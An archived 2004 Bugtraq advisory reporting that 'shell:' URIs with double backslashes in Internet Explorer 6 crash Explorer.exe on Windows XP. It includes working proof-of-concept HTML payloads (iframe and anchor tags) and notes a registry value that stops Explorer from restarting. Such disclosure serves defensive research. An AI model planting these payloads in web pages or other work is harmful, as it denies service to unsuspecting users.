Internet Explorer Causing Explorer.exe - Null Pointer Crash

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 03/19/04

  • Next message: Shaun Colley: "Samba 'smbprint' script tmpfile vulnerability."
    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Fri, 19 Mar 2004 19:30:16 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Internet Explorer & Explorer.exe
    Vendors: http://www.microsoft.com
    Versions: Windows Xp Professional & Internet Explorer
    6.0.2600.0000.xpclnt_qfe.021108-2107
    Patched With: Q330994; Q822925; Q828750; Q824145;
    Platforms: WindowsXp
    Bug: Internet Explorer Causing Explorer.exe - Null Pointer
    Crash
    Risk: Medium - D.O.S
    Exploitation: Remote with browser
    Date: 19 Mar 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    WindowsXp is currently the most common operating system in the world.
    This product must be as safe as it is common.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    Lately a new function was discovered : "shell:". This function allows
    running some
    new functions remotley. There is a bug in Explorer.exe when accessing a
    filename
    with double backslash.

    For Example accessing any of the html tags below, will cause explorer to
    crash.
    <iframe src=shell:windows\\system32\\calc.exe></iframe>
    Or
    <a href=shell:windows\\system32\\calc.exe></a>
    Or
    Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

    Explorer.exe crashes when using "\\".
    "\" doesn't crash it and even %5C%5C doesn't crash it.

    There is a registery key which is turned on by default. This key
    automatically restarts
    "Explorer.exe". If this key is set to "0", Explorer.exe will not restart.

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "AutoRestartShell"=dword:00000001

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    <iframe src=shell:windows\\system32\\calc.exe></iframe>
    Or
    <a href=shell:windows\\system32\\calc.exe></a>
    Or
    Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com

    "Things that are unlikeable, are NOT impossible."


  • Next message: Shaun Colley: "Samba 'smbprint' script tmpfile vulnerability."

    Relevant Pages

    • NOT GOOD: Outlook Express 6 + Internet Explorer 6
      ... Internet Explorer 'bug' presently in the wild [original ... the Microsoft Internet Explorer browser. ... Express email client from the same merchant might be necessary: ... What we then do is construct our original functional demo to: ...
      (NT-Bugtraq)
    • [Full-Disclosure] NOT GOOD: Outlook Express 6 + Internet Explorer 6
      ... Internet Explorer 'bug' presently in the wild [original ... the Microsoft Internet Explorer browser. ... Express email client from the same merchant might be necessary: ... What we then do is construct our original functional demo to: ...
      (Full-Disclosure)
    • NOT GOOD: Outlook Express 6 + Internet Explorer 6
      ... Internet Explorer 'bug' presently in the wild [original ... the Microsoft Internet Explorer browser. ... Express email client from the same merchant might be necessary: ... What we then do is construct our original functional demo to: ...
      (Bugtraq)
    • Re: Cannot drag a link from Outlook Express to IE anymore
      ... where it discusses installing the fix in KB article 834707, ... MS04-038: Cumulative Security Update for Internet Explorer: ... > people that are having the same problem with this BUG. ... >>> browser is not IE. ...
      (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
    • Internet Explorer wininet.dll URL parsing memory corruption technical details
      ... Internet Explorer 6.0, 5.5, 5.01 ... 3APA3A, http://www.security.nnov.ru/ bug research ... because it's not typical buffer ... Because translated hostname points to empty memory chunk it contains ...
      (NT-Bugtraq)